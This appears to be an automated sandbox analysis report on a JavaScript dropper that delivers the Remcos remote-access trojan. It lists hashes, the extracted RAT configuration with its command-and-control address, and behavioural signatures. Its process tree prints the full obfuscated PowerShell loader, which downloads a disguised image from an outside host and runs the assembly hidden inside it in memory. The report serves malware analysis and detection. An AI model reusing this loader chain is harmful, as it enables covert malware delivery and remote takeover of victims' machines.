Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
08/12/2023, 04:26
Static task
static1
Behavioral task
behavioral1
Sample
Order NO.Z21239.js
Resource
win7-20231130-en
Behavioral task
behavioral2
Sample
Order NO.Z21239.js
Resource
win10v2004-20231127-en
General
-
Target
Order NO.Z21239.js
-
Size
37KB
-
MD5
9a3023af33fda17f03ff64a98754eaa1
-
SHA1
7af8e08834bdc119be414d94d676ba557d547b55
-
SHA256
4f378640f60e4c8591322a5b9d48223ea8cfc0776ac5f447dcefafba0e3398c6
-
SHA512
dbc5db97af979d70c908d44b81eb62f6fce0f61aa4655eb497e322def951d5c59fdd4a167c8dd4b5b6150d9ea37bd9a366e85f51494b2ce407bc6f9c533ea18a
-
SSDEEP
768:dFWlDgSvfU3vfc5/gTaJgA7jojqjRvMj5vMplDt2olDCgT3lDlg2lDAoH:d8BgRugmJgA9Bt2oBCgrBlg2BAoH
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835
https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835
Extracted
remcos
RemoteHost
107.172.31.178:1070
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-KALL9Q
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 1996 wscript.exe 29 4576 powershell.exe 39 4576 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation wscript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4576 set thread context of 744 4576 powershell.exe 97 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3240 powershell.exe 3240 powershell.exe 4576 powershell.exe 4576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3240 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1996 wrote to memory of 3240 1996 wscript.exe 89 PID 1996 wrote to memory of 3240 1996 wscript.exe 89 PID 3240 wrote to memory of 4576 3240 powershell.exe 91 PID 3240 wrote to memory of 4576 3240 powershell.exe 91 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97 PID 4576 wrote to memory of 744 4576 powershell.exe 97
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:744
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82